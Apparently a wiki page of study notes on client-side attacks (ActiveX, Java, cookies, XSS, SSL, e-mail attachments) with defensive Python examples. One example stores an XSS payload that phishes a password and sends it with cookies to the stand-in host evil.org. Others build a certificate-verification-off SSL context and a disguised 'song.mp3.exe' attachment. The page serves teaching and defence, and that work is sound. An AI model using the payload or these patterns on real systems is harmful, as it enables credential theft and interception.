== Internet Client Vulnerabilities ==

* Of the numerous techniques used to exploit Internet end users:

  * Software exploits are the most insidious.

  * This is because a software flaw usually lets an attacker do their bidding with little or no visibility on the part of the victim (no prompt, no download dialog, nothing to click).

== ActiveX ==

* Microsoft ActiveX
  * Microsoft's answer to Java
  * First real attempt at a model for portable, remotely consumable software applications
  * ActiveX applications, or controls
  * Can be written to perform specific functions
  * Such as displaying a movie or sound file
  * Can be embedded in a web page to provide this functionality
   * Example
   * Like Microsoft's Object Linking and Embedding (OLE), which supports embedding of Excel spreadsheets within Word documents
   * Usually have the .ocx file extension
  
  * When Internet Explorer encounters a web page with an embedded ActiveX control (or multiple controls)
  * It first checks the user's local system Registry (the CLSID given in the tag's CLASSID attribute) to find out whether that component is available on the user's machine
  * If it is, IE displays the web page, loads the control into the browser's memory address space, and executes its code with the user's privileges.
  * If the control is not already installed on the user's computer, IE downloads and installs the control from the location specified in the CODEBASE attribute of the <OBJECT> tag.
  * Optionally, it verifies the origin of the code using Authenticode and then executes that code
   * Controls are downloaded to the location specified by the Registry string value
  * (REG_SZ) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ActiveXCache
  * Default in XP is %systemroot%\Downloaded Program Files
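The lookup IE performs for each <OBJECT> tag, written out as a small audit script. This is an added example, not code from the book or these notes: the CLSIDs, the sample page and the "installed controls" table standing in for the Registry are all made up, and the note about the CODEBASE scheme goes one step beyond the notes, which do not discuss how the control reaches the machine.

```python
"""Added example: classify the <OBJECT> tags of a page the way the notes
describe IE doing it. CLSIDs, URLs and the registry stand-in are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the HKCR\CLSID lookup IE performs: CLSID -> installed .ocx (hypothetical)
INSTALLED_CONTROLS = {
    "{11111111-2222-3333-4444-555555555555}": r"C:\WINDOWS\system32\example.ocx",
}


class ObjectTagCollector(HTMLParser):
    """Collect the attributes of every <OBJECT> tag in a page."""

    def __init__(self):
        super().__init__()
        self.objects = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "object":
            self.objects.append({k.lower(): (v or "") for k, v in attrs})


def normalize_clsid(value):
    """'clsid:abc...' or 'CLSID:{abc...}' -> '{ABC...}' (the Registry key form)."""
    v = value.strip()
    if v.lower().startswith("clsid:"):
        v = v[len("clsid:"):]
    return "{" + v.strip("{}").upper() + "}"


def classify_object(attrs, installed=INSTALLED_CONTROLS):
    """Decide what IE would do with one <OBJECT> tag.

    Returns (decision, detail):
      'run-local'   CLSID is registered: the .ocx is loaded into IE's address
                    space and its code runs with the user's privileges
      'download'    CLSID not registered: IE fetches CODEBASE and installs it
                    (this is the step where Authenticode applies)
      'not-activex' no CLASSID at all (a plain <object data=...> tag)
    """
    if "classid" not in attrs:
        return "not-activex", ""
    clsid = normalize_clsid(attrs["classid"])
    if clsid in installed:
        return "run-local", installed[clsid]
    codebase = attrs.get("codebase", "")
    if not codebase:
        return "download", "no CODEBASE given, so the control cannot be fetched"
    scheme = urlparse(codebase).scheme or "relative URL"
    note = ""
    if scheme != "https":
        note = (" (fetched over %s: anyone on the path can substitute the binary,"
                " so the Authenticode signature is the only thing that would catch the swap)" % scheme)
    return "download", codebase + note


def audit_page(html, installed=INSTALLED_CONTROLS):
    """Run the classification over every <OBJECT> tag in a page."""
    parser = ObjectTagCollector()
    parser.feed(html)
    return [classify_object(o, installed) for o in parser.objects]


# Constructed sample page: one installed control, one remote control, one non-ActiveX object
SAMPLE_HTML = """
<html><body>
<object classid="clsid:11111111-2222-3333-4444-555555555555" width="1" height="1"></object>
<object classid="CLSID:{99999999-8888-7777-6666-555555555555}"
        codebase="http://downloads.example.invalid/player.cab#version=1,0,0,0"></object>
<object data="movie.swf" type="application/x-shockwave-flash"></object>
</body></html>
"""

if __name__ == "__main__":
    for decision, detail in audit_page(SAMPLE_HTML):
        print(decision, detail)
```

The 1x1 pixel control in the sample is the point of the notes' "little or no visibility" remark: an already-registered control runs as soon as the page is displayed, with nothing on screen to tell the user it happened.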

=== ActiveX Security Model ===
* Acting within the model described in the previous section, malicious programmers could write ActiveX controls to do just about anything they want to a user's machine.
* The thing that stands in the way is Microsoft's Authenticode paradigm.
* Authenticode allows developers to "sign" their code using a cryptographic mechanism (a digital signature backed by a certificate from a third-party certification authority, typically VeriSign Corporation) that IE verifies before the code is executed.
 * Example of how ActiveX could be used for malicious activity
 * In 1996 Fred McLain wrote an ActiveX control that shut down the user's system cleanly (if it was running Windows 95 with Advanced Power Management).
 * It was called Internet Exploder.
 * The control was validly signed: Authenticode tells you who signed a control, not what it does.
 * Safe for Scripting
 * Was the next significant security challenge.
 * A control marked "safe for scripting" can be driven by script on any web page, and because it is already installed there is no Authenticode prompt at all; this is how an attacker could get a malicious program onto your computer when you simply visited their website, by manipulating such a control, for example the Scriptlet control.
 * Scriptlet.typelib can create, edit, and overwrite files on the hard disk.
 * Eyedog has the ability to query the Registry and gather machine characteristics.
 * Both shipped with Windows marked safe for scripting, so neither the control nor the page calling it needed a signature.

=== ActiveX Abuse Countermeasures ===

* From a developer's perspective, don't mark a control safe for scripting if it can perform privileged actions (file, Registry, or process access) on a user's system.
* Restrict or disable ActiveX through the use of Microsoft Internet Explorer security zones (Tools > Internet Options > Security): set "Run ActiveX controls and plug-ins" and "Script ActiveX controls marked safe for scripting" to Disable or Prompt in the Internet zone, and allow them only for sites placed in Trusted Sites.

== Java ==

* Created by Sun Microsystems.
* Was created primarily to enable portable, remotely consumable software applications.
* Differed from ActiveX in that it included a security "sandbox" that restricts what an untrusted applet may do (no file access, no arbitrary network connections), and a managed, bounds-checked runtime that keeps programmers from making many of the mistakes that lead to security problems, such as buffer overflows.
 * Vulnerabilities found
 * In November 2004, Jouko Pynnönen published an advisory on a devastating vulnerability in Sun's Java Plug-in, which is what permits browsers to run Java applets.
 * The vulnerability essentially allowed malicious web pages to disable Java's security restrictions and break out of the Java sandbox, effectively neutering the security of the platform.
 * The lesson: the sandbox is only as strong as the implementation enforcing it, so an unpatched plug-in gives a web page the same reach as a malicious ActiveX control.

=== Java Countermeasures ===

* Restrict Java through the use of Microsoft Internet Explorer security zones (the "Java permissions" setting in the Internet zone).
* For non-IE browsers, consult the browser's documentation on how to restrict or disable the Java plug-in.
* Keep the Java Plug-in itself patched; the zone setting does not fix a broken plug-in.

== JavaScript and Active Scripting ==

* Originally called "LiveScript", and still associated by name with Sun's Java, but actually a separate scripting language created by Netscape.
* Blends Perl-like ease of use with C/C++-like power.
 * This made it popular.
 * It also makes it attractive to hackers.
 * It makes it easy to fool the user into entering sensitive information (fake dialogs, spoofed status bars, rewritten links).
 * Microsoft platforms execute JavaScript (JScript) and other client-side scripting languages using a Component Object Model (COM) based technology called Active Scripting, which is also what lets script drive ActiveX controls.
 * The security issues are not caused by the technology itself but by abuse of the power and access it gives a web page.

=== JavaScript Countermeasures ===

* Restrict JavaScript and Active Scripting through the use of Microsoft Internet Explorer security zones (the "Active scripting" setting in the Internet zone).

== Cookies ==

* HTTP, the protocol underlying the World Wide Web, is stateless; cookies are what allow a site to track things from one visit to another.
* Cookies are special tokens carried in HTTP responses (the Set-Cookie header) and requests (the Cookie header) that allow websites to remember who you are from visit to visit.
* Because a session cookie is the only proof of identity presented after login, attackers who get their hands on your cookies might be able to spoof your online identity or glean sensitive information.
* The brute-force way to hijack cookies is to sniff them off the network and then replay them to the server; this works whenever the cookie travels over plain HTTP.
 
=== Cookie Abuse Countermeasures ===

* Get a tool to manage cookies.
* Use IE's cookie-screening feature (Tools > Internet Options > Privacy).
* Use SSL, so that cookies are not sent in the clear; a site reinforces this by marking the cookie Secure, so the browser never sends it over plain HTTP.
* Disable cookies (at the cost of breaking sites that need them).
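The sniff-and-replay attack above and the "use SSL" countermeasure come down to the attributes a server puts on its Set-Cookie header. The audit below is an added example, not code from the book or these notes; the two sites, their URLs and the headers they send are constructed, and the HttpOnly and SameSite checks go beyond what the notes mention.

```python
"""Added example: audit Set-Cookie headers for the attributes that decide
whether a cookie can be sniffed off the wire or read by injected script.
The responses below are constructed sample data."""
from http.cookies import SimpleCookie

# Constructed sample responses: a careless site over plain HTTP and a hardened one over SSL
RESPONSES = {
    "http://shop.example.invalid/login": [
        "Set-Cookie: SESSIONID=a1b2c3d4; Path=/",
    ],
    "https://bank.example.invalid/login": [
        "Set-Cookie: SESSIONID=z9y8x7w6; Path=/; Secure; HttpOnly; SameSite=Lax",
        "Set-Cookie: lang=en; Path=/",
    ],
}

# Cookie names that carry the login state and therefore deserve every flag
SESSION_COOKIE_NAMES = {"SESSIONID"}


def parse_set_cookie(header_line):
    """'Set-Cookie: NAME=value; attr; attr=val' -> (NAME, Morsel)."""
    jar = SimpleCookie()
    jar.load(header_line.split(":", 1)[1].strip())
    (name, morsel), = jar.items()
    return name, morsel


def audit_cookie(url, header_line):
    """Return (name, list of weaknesses that make this cookie stealable)."""
    name, m = parse_set_cookie(header_line)
    findings = []
    if not url.startswith("https://"):
        findings.append("issued over plain HTTP: visible to anyone sniffing the network")
    if not m["secure"]:
        findings.append("no Secure flag: the browser will also send it over plain HTTP, "
                        "where it can be sniffed and replayed")
    if name in SESSION_COOKIE_NAMES:
        if not m["httponly"]:
            findings.append("no HttpOnly flag: readable by injected script via document.cookie")
        if not m["samesite"]:
            findings.append("no SameSite attribute: attached to cross-site requests")
    return name, findings


def audit_all(responses=RESPONSES):
    """{(url, cookie name): [findings]} for every Set-Cookie header seen."""
    report = {}
    for url, headers in responses.items():
        for header_line in headers:
            name, findings = audit_cookie(url, header_line)
            report[(url, name)] = findings
    return report


def replay_header(sniffed_set_cookie):
    """What the attacker sends back: the stolen token as a plain Cookie header.
    Nothing else is needed, which is why sniffing alone is enough to hijack."""
    name, m = parse_set_cookie(sniffed_set_cookie)
    return "Cookie: %s=%s" % (name, m.value)


if __name__ == "__main__":
    for (url, name), findings in audit_all().items():
        print(url, name, findings or "ok")
    print(replay_header(RESPONSES["http://shop.example.invalid/login"][0]))
```

The Secure flag is the server-side half of "use SSL": without it a site that serves its pages over SSL still leaks the session cookie the moment the user follows a plain http:// link to the same host.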

== Cross-Site Scripting (XSS) ==

* XSS typically results from a web application that takes input from one user and displays it to another user without encoding it, so HTML or script supplied by the first user runs in the second user's browser.
 * Example
 * The attacker posts a message containing script. After a little while the script pops up a dialog saying the session has ended and asks the user to enter their password to continue; whatever is typed is sent to evil.org, a rogue server set up by the hacker to capture the unsuspecting user's input.
 * Because the script runs in the context of the legitimate site, it can also read that site's cookies (document.cookie) and send them along.
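The guestbook below shows the pattern described above in both forms: the page as a careless developer writes it, and the same page with output encoding. This is an added example, not code from the book or these notes; evil.org is the notes' own placeholder for the rogue server, and the comments, authors and payload are constructed.

```python
"""Added example: one user's stored input rendered to every later visitor,
first unencoded (the payload runs) and then HTML-escaped (it is shown as text).
Payload, authors and comments are constructed."""
import html

# Constructed attacker comment: after 30 s it shows a fake "session ended" prompt and
# sends whatever the victim types, plus the site's cookies, to evil.org
PAYLOAD = (
    '<script>setTimeout(function(){'
    'var p=prompt("Your session has ended. Enter your password to continue:");'
    'new Image().src="http://evil.org/c?p="+encodeURIComponent(p)'
    '+"&c="+encodeURIComponent(document.cookie);'
    '},30000);</script>'
)

GUESTBOOK = []  # what one user posts, every later visitor sees


def post_comment(author, text):
    GUESTBOOK.append((author, text))


def render_vulnerable():
    """Interpolates stored input straight into the HTML: the payload executes."""
    rows = "".join("<li><b>%s</b>: %s</li>" % (a, t) for a, t in GUESTBOOK)
    return "<html><body><h1>Guestbook</h1><ul>%s</ul></body></html>" % rows


def render_escaped():
    """Encodes & < > \" ' before interpolation: the payload is displayed as text.
    This is the right encoder for HTML body text only; attribute values, URLs
    and script blocks each need their own."""
    rows = "".join(
        "<li><b>%s</b>: %s</li>" % (html.escape(a, quote=True), html.escape(t, quote=True))
        for a, t in GUESTBOOK
    )
    return "<html><body><h1>Guestbook</h1><ul>%s</ul></body></html>" % rows


def has_live_script(page):
    """True if a real <script> tag (not an encoded one) survives in the page."""
    return "<script" in page.lower()


def demo():
    """Seed the guestbook and return (vulnerable page executes, escaped page executes)."""
    del GUESTBOOK[:]
    post_comment("alice", "Nice site!")
    post_comment("mallory", PAYLOAD)
    return has_live_script(render_vulnerable()), has_live_script(render_escaped())


if __name__ == "__main__":
    print(demo())
    print(render_escaped())
```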

== SSL Attacks ==

* Based on public-key cryptography: the server proves its identity with a certificate, and the session keys are negotiated under that identity.
* SSL is a specification, and as such it is open to interpretation by those who implement it.
* IMPLEMENTATION flaws can reduce the security of any specification to zero: a client that accepts any certificate, or validates the chain badly, gives an attacker in the middle a "secure" connection to the victim.
 
=== SSL Countermeasures ===

* Keep your Internet client software fully updated and patched.
* Verify the SSL certificate: it should be issued by a trusted authority, be within its validity dates, and carry the name of the site you intended to visit; treat a browser certificate warning as a reason to stop, not a prompt to click through.
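What "verify the SSL certificate" means in code, for Python's ssl module: the client configuration that keeps chain and hostname checking on beside the one that switches it off, and the hostname and validity checks done by hand on a certificate. This is an added example, not code from the book or these notes; the certificate dictionary is constructed to look like what ssl.SSLSocket.getpeercert() returns, and no network connection is made.

```python
"""Added example: the client-side certificate checks behind 'verify the SSL
certificate'. SHOP_CERT is a constructed getpeercert()-style dict."""
import datetime as dt
import ssl


def hardened_context():
    """What a client should use: CA chain verification and hostname check on."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def weak_context():
    """The usual 'make the warning go away' change: all verification off.
    Any server, including one in the middle, is accepted."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def context_is_safe(ctx):
    return ctx.verify_mode == ssl.CERT_REQUIRED and bool(ctx.check_hostname)


def _dns_match(pattern, hostname):
    """Match one certificate DNS name against the requested host: exact, or a
    single leading '*' label covering exactly one label (RFC 6125 rules)."""
    pattern, hostname = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def utc(year, month, day):
    """Aware UTC timestamp, used as the 'now' for the validity check."""
    return dt.datetime(year, month, day, tzinfo=dt.timezone.utc)


def cert_matches_host(cert, hostname, now=None):
    """Validity window, then hostname against subjectAltName, on a getpeercert()
    dict. The CN is deliberately ignored, as current browsers do. Issuer trust
    is the chain check hardened_context() performs and is not repeated here."""
    now = now or dt.datetime.now(dt.timezone.utc)
    fmt = "%b %d %H:%M:%S %Y GMT"  # the notBefore/notAfter format getpeercert() uses
    not_before = dt.datetime.strptime(cert["notBefore"], fmt).replace(tzinfo=dt.timezone.utc)
    not_after = dt.datetime.strptime(cert["notAfter"], fmt).replace(tzinfo=dt.timezone.utc)
    if not (not_before <= now <= not_after):
        return False, "certificate expired or not yet valid"
    names = [v for kind, v in cert.get("subjectAltName", ()) if kind == "DNS"]
    if not names:
        return False, "no DNS names in subjectAltName"
    if not any(_dns_match(n, hostname) for n in names):
        return False, "hostname %s not covered by %s" % (hostname, names)
    return True, "ok"


# Constructed certificate dict, shaped like ssl.SSLSocket.getpeercert() output
SHOP_CERT = {
    "subject": ((("commonName", "shop.example.invalid"),),),
    "issuer": ((("commonName", "Example CA"),),),
    "notBefore": "Jan  1 00:00:00 2010 GMT",
    "notAfter": "Dec 31 23:59:59 2010 GMT",
    "subjectAltName": (("DNS", "shop.example.invalid"), ("DNS", "*.pay.example.invalid")),
}

if __name__ == "__main__":
    print("hardened safe:", context_is_safe(hardened_context()))
    print("weak safe:", context_is_safe(weak_context()))
    for host in ("shop.example.invalid", "www.pay.example.invalid", "evil.example.invalid"):
        print(host, cert_matches_host(SHOP_CERT, host, now=utc(2010, 6, 1)))
```

weak_context() is the configuration that reduces SSL "to zero" as the notes put it: the handshake still completes and the padlock logic still fires, but the peer could be anyone.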

== E-mail Hacking ==

* The single most effective avenue into the computing space of the Internet user.
* Becomes a very powerful attack when HTML mail carries embedded ActiveX and JavaScript, and e-mail extends this with its own capabilities, such as file attachments.

=== File Attachments ===

* One of the most convenient features of e-mail is the ability to attach files.
* This can be used to deliver executable payloads directly to an end user's desktop.
* The greatest single vector of attack since the beginning.
* Disguising executables as MP3s or other file types, for example a file named song.mp3.exe, which Windows displays as song.mp3 when "Hide extensions for known file types" is on (the default).

=== MIME ===

* The technology underlying e-mail attachments has also played a significant role in the history of client hacking.
* Multipurpose Internet Mail Extensions (MIME) is the standard for attaching files to e-mail messages: the message is split into parts, each labelled with a Content-Type and, for attachments, a Content-Disposition with a filename, and binary parts are Base64-encoded so they survive 7-bit mail transport.
* A client that trusts the declared Content-Type or the visible file name rather than the file's actual contents can be tricked into running an executable that claims to be something harmless.
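The two previous sections, File Attachments and MIME, together describe one thing worth seeing end to end: a message with a disguised executable, built the way a sender would build it, then taken apart the way a mail gateway or client should. This is an added example, not code from the book or these notes; the message, the addresses and the attachment bytes are constructed (the "MZ" prefix is the real DOS/PE executable signature, the rest of the payload is filler).

```python
"""Added example: build a MIME message carrying 'song.mp3.exe' and audit its
attachments by content rather than by name or declared type.
Addresses, message text and payload bytes are constructed."""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

EXECUTABLE_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta"}


def build_sample_message():
    """Attacker's message: 'song.mp3.exe' declared as audio/mpeg but really a PE stub."""
    msg = EmailMessage()
    msg["From"] = "friend@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "that song you wanted"
    msg.set_content("Here it is, just double click to play.")
    fake_mp3 = b"MZ" + b"\x90" * 62 + b"This program cannot be run in DOS mode."
    msg.add_attachment(fake_mp3, maintype="audio", subtype="mpeg", filename="song.mp3.exe")
    real_mp3 = b"ID3\x03\x00" + b"\x00" * 32
    msg.add_attachment(real_mp3, maintype="audio", subtype="mpeg", filename="real.mp3")
    return msg.as_bytes()  # parts are Base64-encoded by the email package


def sniff_type(data):
    """Content-based type check, independent of what the headers claim."""
    if data[:2] == b"MZ":
        return "executable"
    if data[:3] == b"ID3" or data[:2] == b"\xff\xfb":
        return "audio/mpeg"
    return "unknown"


def suspicious_extension(filename):
    """(has executable extension, is a double extension such as .mp3.exe)."""
    parts = filename.lower().split(".")
    last = "." + parts[-1] if len(parts) > 1 else ""
    exe = last in EXECUTABLE_EXT
    return exe, exe and len(parts) > 2


def audit_attachments(raw):
    """Walk every attachment: (filename, declared type, sniffed type, flags)."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    report = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or "(unnamed)"
        declared = part.get_content_type()
        data = part.get_payload(decode=True)  # undoes the Base64 transfer encoding
        actual = sniff_type(data)
        exe_ext, double_ext = suspicious_extension(filename)
        flags = []
        if exe_ext:
            flags.append("executable extension")
        if double_ext:
            flags.append("double extension (disguised)")
        if actual == "executable" and not declared.startswith("application/"):
            flags.append("content is executable but declared " + declared)
        report.append((filename, declared, actual, flags))
    return report


if __name__ == "__main__":
    for row in audit_attachments(build_sample_message()):
        print(row)
```

The content check is the one that matters: the double-extension and Content-Type checks catch this particular disguise, but a sender can rename the file to anything and declare any type, while the first bytes of a Windows executable are always the same.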

=== E-mail Hacking Countermeasures ===

* Keep your software up to date.
* Don't open attachments from people you don't know, or from chain forwards.
* Disable ActiveX and JavaScript (active content) in the e-mail client.

== General Microsoft Client-Side Countermeasures ==

* Deploy a personal firewall.
* Keep up to date on all software patches.
* Run antivirus software.
* Run with least privilege (a non-administrator account for day-to-day use).
* Administrators should also run this software at network choke points (mail gateways, web proxies).
* Read e-mail in plain text.
* Configure office productivity programs as securely as possible (macro security set to high).
* Don't be gullible.
* Keep your computing devices physically secure.

== Malware ==

* Includes:
 * Viruses.
 * Worms.
 * Rootkits and backdoors.
 * Bots and zombies.
 * Trojan horses.
 
=== Countermeasures ===

* Always back up your system before you have any problems.
* Clean it up with the appropriate tools.
 * Meaning anti-virus.
* The book recommends:
 * McAfee.
 * Symantec.
 * Computer Associates.
 * Panda.
 * Microsoft.
* I recommend:
 * Kaspersky.
 * Webroot (SpySweeper with antivirus).
 * Computer Associates.

= Quiz =

1 What was Microsoft's answer to Java? ActiveX

2 Who created JavaScript? Netscape

3 What is the protocol over which the majority of e-commerce transactions occur? SSL

4 What are 3 of the General Microsoft Client-Side Countermeasures?

 * Deploy a personal firewall
 * Keep up to date on all software patches
 * Run antivirus software
 * Run with least privilege
 * Administrators should run the mentioned software at choke points
 * Read e-mail in plain text
 * Configure office productivity programs as securely as possible
 * Don’t be gullible
 * Keep your computing devices physically secure

HackingExposedChapter12 (last edited 2010-04-26 01:40:33 by c-68-53-233-3)